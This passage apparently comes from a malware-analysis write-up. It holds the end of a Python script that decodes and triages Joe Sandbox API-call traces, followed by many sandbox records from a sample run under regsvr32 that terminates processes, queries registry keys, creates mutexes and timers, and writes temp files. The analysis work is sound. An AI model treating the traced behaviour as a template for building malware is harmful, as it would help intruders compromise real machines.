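• CreateFileMappingW.KERNEL32(000000FF,04BEE268,00000004,00000000,00001000,?), ref: 04BDED0E
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 04BDED37
• OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 04BD5021
• TerminateProcess.KERNEL32(00000000,00000000), ref: 04BD5030
• RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04BCAC8C
  • Part of subcall function 04BC7A3C: InterlockedIncrement.KERNEL32(?), ref: 04BC7A8D
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Standard Win32 constants (bit flags or enumerations).
PROCESS_ACCESS = {0x1: "PROCESS_TERMINATE", 0x2: "PROCESS_CREATE_THREAD",
                  0x8: "PROCESS_VM_OPERATION", 0x10: "PROCESS_VM_READ",
                  0x20: "PROCESS_VM_WRITE", 0x400: "PROCESS_QUERY_INFORMATION",
                  0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
MOVE_METHOD = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}
FILE_MAP = {0x1: "FILE_MAP_COPY", 0x2: "FILE_MAP_WRITE", 0x4: "FILE_MAP_READ", 0x20: "FILE_MAP_EXECUTE"}
HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
        0x80000002: "HKEY_LOCAL_MACHINE"}


def flags(value, table):
    """Render a bit mask symbolically; unknown bits are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"


def enum(value, table):
    return table.get(value, hex(value))


# (API name, zero-based parameter index) -> decoder for that parameter.
DECODERS = {
    ("OpenProcess", 0): lambda v: flags(v, PROCESS_ACCESS),
    ("CreateFileW", 1): lambda v: flags(v, GENERIC),
    ("CreateFileW", 4): lambda v: enum(v, DISPOSITION),
    ("SetFilePointer", 3): lambda v: enum(v, MOVE_METHOD),
    ("CreateFileMappingW", 2): lambda v: enum(v, PAGE_PROTECT),
    ("MapViewOfFile", 1): lambda v: flags(v, FILE_MAP),
    ("RegOpenKeyA", 0): lambda v: enum(v, HKEY),
}


def parse_arg(tok):
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)   # '?' = unknown at analysis time


def parse_calls(text):
    """Return one dict per API line: api, module, args, ref address, subcall."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
        calls.append({"api": m["api"], "module": m["mod"], "args": args,
                      "ref": int(m["ref"], 16), "subcall": m["sub"]})
    return calls


def decode_call(call):
    """Pretty-print a call with known parameters replaced by symbolic names."""
    out = []
    for i, v in enumerate(call["args"]):
        dec = DECODERS.get((call["api"], i))
        if v is None:
            out.append("?")
        elif dec:
            out.append(dec(v))
        else:
            out.append(f"{v:08X}" if v >= 0 else f"-{-v:08X}")
    return f"{call['api']}({', '.join(out)})"


# Heuristic labels for call combinations seen in this report's records.
BEHAVIOURS = {
    "opens a process for termination": lambda a: {"OpenProcess", "TerminateProcess"} <= a,
    "creates and maps a shared section": lambda a: {"CreateFileMappingW", "MapViewOfFile"} <= a,
    "appends to a file": lambda a: {"SetFilePointer", "WriteFile", "SetEndOfFile"} <= a,
    "queries target bitness": lambda a: "IsWow64Process" in a,
}


def triage(calls):
    """Labels for the direct (non-subcall) API set of a record."""
    apis = {c["api"] for c in calls if c["subcall"] is None}
    return [name for name, pred in BEHAVIOURS.items() if pred(apis)]


if __name__ == "__main__":
    parsed = parse_calls(SAMPLE)
    for c in parsed:
        print(f"{c['ref']:08X}  {decode_call(c)}")
    print("triage:", triage(parsed))
```

Run over a real report, feed each record's "APIs" block to `parse_calls` separately so that `triage` labels one function at a time; the decoded output makes the 00000410 on the earlier OpenProcess read as PROCESS_VM_READ|PROCESS_QUERY_INFORMATION and the 80000001 on RegOpenKeyA as HKEY_CURRENT_USER without a constants lookup.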

                APIs
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D66
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D7F
                  • Part of subcall function 04BD0D54: GetCurrentThreadId.KERNEL32 ref: 04BD0D8C
                  • Part of subcall function 04BD0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D98
                  • Part of subcall function 04BD0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0DA6
                  • Part of subcall function 04BD0D54: lstrcpy.KERNEL32(00000000), ref: 04BD0DC8
                • lstrcpy.KERNEL32(-000000FC,00000000), ref: 04BCD633
                • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00002365), ref: 04BCD645
                • GetTickCount.KERNEL32 ref: 04BCD650
                • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,?,00002365), ref: 04BCD65C
                • lstrcpy.KERNEL32(00000000), ref: 04BCD676
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                • String ID: \Low
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleA.KERNEL32(?,?,?,?,?,04BC1DC6,00000000), ref: 04BCAEE6
                • GetProcAddress.KERNEL32(00000000,?), ref: 04BCAEFF
                • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,04BC1DC6,00000000), ref: 04BCAF1C
                • IsWow64Process.KERNEL32(?,?,?,?,?,?,04BC1DC6,00000000), ref: 04BCAF2D
                • CloseHandle.KERNEL32(?,?,?,?,04BC1DC6,00000000), ref: 04BCAF40
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HandleProcess$AddressCloseModuleOpenProcWow64
                • String ID: PWt
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleA.KERNEL32(00000000,?), ref: 04BCCC89
                • GetLastError.KERNEL32 ref: 04BCCCAF
                • SetEvent.KERNEL32(00000000), ref: 04BCCCC2
                • GetModuleHandleA.KERNEL32(00000000), ref: 04BCCD0B
                • memset.NTDLL ref: 04BCCD20
                • RtlExitUserThread.NTDLL(?), ref: 04BCCD55
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HandleModule$ErrorEventExitLastThreadUsermemset
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID:
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BD74EA
                • HeapFree.KERNEL32(00000000,04BED06E,?,?,04BC906C,?,04BED06E,?,?,?,?), ref: 04BD7520
                • GetComputerNameW.KERNEL32(00000000,?), ref: 04BD752E
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BD7545
                • GetComputerNameW.KERNEL32(00000000,?), ref: 04BD7556
                • HeapFree.KERNEL32(00000000,00000000,?,?,04BC906C,?,04BED06E,?,?,?,?), ref: 04BD757C
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$AllocateComputerFreeName
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(?), ref: 04BC3DBE
                • lstrlen.KERNEL32(?), ref: 04BC3DD4
                • lstrlen.KERNEL32(?), ref: 04BC3DE9
                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04BC3E4E
                • _snprintf.NTDLL ref: 04BC3E74
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 04BC3E93
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateFree_snprintf
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 04BD5FBC
                • CreateWaitableTimerA.KERNEL32(04BEE268,00000003,?), ref: 04BD5FD9
                • GetLastError.KERNEL32(?,?,04BDE5BD,?,?,?,00000000,?,?,?), ref: 04BD5FEA
                  • Part of subcall function 04BCBC31: RegQueryValueExA.KERNELBASE(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,00000003,00000000,?,00000000,?,04BDE5BD,04BDE5BD,?,04BD6019,00000000), ref: 04BCBC69
                  • Part of subcall function 04BCBC31: RtlAllocateHeap.NTDLL(00000000,04BD6019), ref: 04BCBC7D
                  • Part of subcall function 04BCBC31: RegQueryValueExA.ADVAPI32(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BCBC97
                  • Part of subcall function 04BCBC31: RegCloseKey.ADVAPI32(?,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?,?,?,00000000,?,?,?), ref: 04BCBCC1
                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BD602A
                • SetWaitableTimer.KERNEL32(00000000,04BDE5BD,00000000,00000000,00000000,00000000,?,?,04BDE5BD,?), ref: 04BD6049
                • HeapFree.KERNEL32(00000000,04BDE5BD,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BD605F
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • StrChrA.SHLWAPI(00000000,00000020,00000000,?,00000000,?,?,?,04BD9A91,00000000,?,04BEE17C,?,?,04BEE218), ref: 04BD4E9D
                • StrChrA.SHLWAPI(00000001,00000020,?,?,?,04BD9A91,00000000,?,04BEE17C,?,?,04BEE218), ref: 04BD4EAE
                  • Part of subcall function 04BCAAD8: lstrlen.KERNEL32(04BD79F2,?,00000000,00000000,?,04BD79F2,00000000,?,00000001,00000000,00000001), ref: 04BCAAEA
                  • Part of subcall function 04BCAAD8: StrChrA.SHLWAPI(00000001,0000000D,?,04BD79F2,00000000,?,00000001,00000000,00000001), ref: 04BCAB22
                • RtlAllocateHeap.NTDLL(00000000,01000000,00000000), ref: 04BD4EEE
                • memcpy.NTDLL(00000000,?,00000007,?,?,?,04BD9A91,00000000,?,04BEE17C,?), ref: 04BD4F1B
                • memcpy.NTDLL(00000000,04BEE218,04BEE218,00000000,?,00000007,?,?,?,04BD9A91,00000000,?,04BEE17C,?), ref: 04BD4F2A
                • memcpy.NTDLL(04BEE218,?,?,00000000,04BEE218,04BEE218,00000000,?,00000007,?,?,?,04BD9A91,00000000,?,04BEE17C), ref: 04BD4F3C
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: memcpy$AllocateHeaplstrlen
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?), ref: 04BC94AF
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04BC94C0
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000,?,?,?,?), ref: 04BC94DB
                • GetLastError.KERNEL32(?,?,?,?), ref: 04BC94F1
                • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 04BC9503
                • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 04BC9518
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 04BD1FD6
                • _strupr.NTDLL ref: 04BD2011
                • lstrlen.KERNEL32(00000000), ref: 04BD2019
                • TerminateProcess.KERNEL32(00000000,00000000), ref: 04BD2058
                • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 04BD205F
                • GetLastError.KERNEL32 ref: 04BD2067
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegOpenKeyA.ADVAPI32(80000001,?,74E5F710), ref: 04BC559C
                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 04BC55CA
                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04BC55DC
                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 04BC5601
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BC561C
                • RegCloseKey.ADVAPI32(?), ref: 04BC5626
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HeapQueryValue$AllocateCloseFreeOpen
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(00000000,74E5F730,-00000001,00000000,?,?,?,04BCD8A7,?,00000000,000000FF), ref: 04BDFCE2
                • lstrlen.KERNEL32(?,?,?,?,04BCD8A7,?,00000000,000000FF), ref: 04BDFCE9
                • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 04BDFCFB
                • _snprintf.NTDLL ref: 04BDFD21
                  • Part of subcall function 04BE2BDD: memset.NTDLL ref: 04BE2BF2
                  • Part of subcall function 04BE2BDD: lstrlenW.KERNEL32(00000000,00000000,00000000,7764DBB0,00000020,00000000), ref: 04BE2C2B
                  • Part of subcall function 04BE2BDD: wcstombs.NTDLL ref: 04BE2C35
                  • Part of subcall function 04BE2BDD: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7764DBB0,00000020,00000000), ref: 04BE2C66
                  • Part of subcall function 04BE2BDD: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04BDFD2F), ref: 04BE2C92
                  • Part of subcall function 04BE2BDD: TerminateProcess.KERNEL32(?,000003E5), ref: 04BE2CA8
                  • Part of subcall function 04BE2BDD: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04BDFD2F), ref: 04BE2CBC
                  • Part of subcall function 04BE2BDD: CloseHandle.KERNEL32(?), ref: 04BE2CEF
                  • Part of subcall function 04BE2BDD: CloseHandle.KERNEL32(?), ref: 04BE2CF4
                • _snprintf.NTDLL ref: 04BDFD55
                  • Part of subcall function 04BE2BDD: GetLastError.KERNEL32 ref: 04BE2CC0
                  • Part of subcall function 04BE2BDD: GetExitCodeProcess.KERNEL32(?,00000001), ref: 04BE2CE0
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 04BDFD72
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(?,00000001,00000000,00000000,?,?,04BD156F,04BDAF39,00000057,00000000), ref: 04BD7014
                • RtlAllocateHeap.NTDLL(00000000,00000009,00000001), ref: 04BD7027
                • lstrcpy.KERNEL32(00000008,?), ref: 04BD7049
                • GetLastError.KERNEL32(04BC209B,00000000,00000000,?,?,04BD156F,04BDAF39,00000057,00000000), ref: 04BD7072
                • HeapFree.KERNEL32(00000000,00000000,?,?,04BD156F,04BDAF39,00000057,00000000), ref: 04BD708A
                • CloseHandle.KERNEL32(00000000,04BC209B,00000000,00000000,?,?,04BD156F,04BDAF39,00000057,00000000), ref: 04BD7093
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D66
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D7F
                • GetCurrentThreadId.KERNEL32 ref: 04BD0D8C
                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D98
                • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0DA6
                • lstrcpy.KERNEL32(00000000), ref: 04BD0DC8
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 04BCD734
                • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 04BCD79B
                • GetLastError.KERNEL32(?,00000000,00000000), ref: 04BCD7A5
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: BuffersErrorFileFlushLastmemset
                • String ID: K$P
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memcpy.NTDLL(?,04BD3804,00000000,?,?,?,04BD3804,?,?,?,?,?), ref: 04BE2F37
                • lstrlen.KERNEL32(04BD3804,?,?,?,04BD3804,?,?,?,?,?), ref: 04BE2F55
                • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 04BE2FC4
                • lstrlen.KERNEL32(04BD3804,00000000,00000000,?,?,?,04BD3804,?,?,?,?,?), ref: 04BE2FE5
                • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 04BE2FF9
                • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 04BE3002
                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 04BE3010
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: lstrlenmemcpy$FreeLocal
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memcpy.NTDLL(?,?,00000010,?,00000110,?), ref: 04BE4C5D
                • memcpy.NTDLL(00000000,?,?,0000011F,?,00000110,?), ref: 04BE4CF0
                • GetLastError.KERNEL32(?,?,0000011F,?,00000110,?), ref: 04BE4D48
                • GetLastError.KERNEL32(?,00000110,?), ref: 04BE4D7A
                • GetLastError.KERNEL32(?,00000110,?), ref: 04BE4D8E
                • GetLastError.KERNEL32(?,00000110,?,?,?,?,?,?,?,?,?,?,?,04BC21D6,00000000,?), ref: 04BE4DA3
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ErrorLast$memcpy
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • lstrcpy.KERNEL32(?,00000020), ref: 04BD25CC
                • lstrcat.KERNEL32(?,00000020), ref: 04BD25E1
                • lstrcmp.KERNEL32(00000000,?), ref: 04BD25F8
                • lstrlen.KERNEL32(?,?,D448B889,00000000,69B25F44), ref: 04BD261C
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BDD39D: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 04BDD3E9
                  • Part of subcall function 04BDD39D: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04BC39E4), ref: 04BDD3F5
                  • Part of subcall function 04BDD39D: memset.NTDLL ref: 04BDD43D
                  • Part of subcall function 04BDD39D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04BDD458
                  • Part of subcall function 04BDD39D: lstrlenW.KERNEL32(0000002C), ref: 04BDD490
                  • Part of subcall function 04BDD39D: lstrlenW.KERNEL32(?), ref: 04BDD498
                  • Part of subcall function 04BDD39D: memset.NTDLL ref: 04BDD4BB
                  • Part of subcall function 04BDD39D: wcscpy.NTDLL ref: 04BDD4CD
                • WaitForSingleObject.KERNEL32(00000000,?,06249998,?,00000000,00000000,00000001), ref: 04BD6708
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04BD6742
                • RegCloseKey.ADVAPI32(?), ref: 04BD676E
                • WaitForSingleObject.KERNEL32(00000000,Function_0000E2C5,04BEE374), ref: 04BD67D2
                • RtlExitUserThread.NTDLL(?), ref: 04BD6808
                  • Part of subcall function 04BD680F: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,04BDDB2C,00000000,?,?), ref: 04BD682D
                  • Part of subcall function 04BD680F: GetFileSize.KERNEL32(00000000,00000000,?,?,04BDDB2C,00000000,?,?,?,?,00000000,04BCC692,?,?,?,?), ref: 04BD683D
                  • Part of subcall function 04BD680F: CloseHandle.KERNEL32(000000FF,?,?,04BDDB2C,00000000,?,?,?,?,00000000,04BCC692,?,?,?,?,00000000), ref: 04BD689F
                  • Part of subcall function 04BE36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,04BE4FFC), ref: 04BE373F
                  • Part of subcall function 04BE36FE: GetLastError.KERNEL32 ref: 04BE3749
                  • Part of subcall function 04BE36FE: WaitForSingleObject.KERNEL32(000000C8), ref: 04BE376E
                  • Part of subcall function 04BE36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 04BE378F
                  • Part of subcall function 04BE36FE: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 04BE37B7
                  • Part of subcall function 04BE36FE: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 04BE37CC
                  • Part of subcall function 04BE36FE: SetEndOfFile.KERNEL32(00000006), ref: 04BE37D9
                  • Part of subcall function 04BE36FE: CloseHandle.KERNEL32(00000006), ref: 04BE37F1
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserWritewcscpy
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BCC9D1: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 04BCC9DD
                  • Part of subcall function 04BCC9D1: SetLastError.KERNEL32(000000B7,?,04BDE569,?,?,00000000,?,?,?), ref: 04BCC9EE
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 04BDE589
                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04BDE661
                  • Part of subcall function 04BD5FA2: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 04BD5FBC
                  • Part of subcall function 04BD5FA2: CreateWaitableTimerA.KERNEL32(04BEE268,00000003,?), ref: 04BD5FD9
                  • Part of subcall function 04BD5FA2: GetLastError.KERNEL32(?,?,04BDE5BD,?,?,?,00000000,?,?,?), ref: 04BD5FEA
                  • Part of subcall function 04BD5FA2: GetSystemTimeAsFileTime.KERNEL32(?,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BD602A
                  • Part of subcall function 04BD5FA2: SetWaitableTimer.KERNEL32(00000000,04BDE5BD,00000000,00000000,00000000,00000000,?,?,04BDE5BD,?), ref: 04BD6049
                  • Part of subcall function 04BD5FA2: HeapFree.KERNEL32(00000000,04BDE5BD,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BD605F
                • GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 04BDE64A
                • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04BDE653
                  • Part of subcall function 04BCC9D1: CreateMutexA.KERNEL32(04BEE268,00000000,?,?,04BDE569,?,?,00000000,?,?,?), ref: 04BCCA01
                • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 04BDE66E
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                • String ID:
                • API String ID: 1700416623-0
                • Opcode ID: 016ab87063acefca6c2c858eaea8a597164dce1c31bf34d64fb241907d2f882d
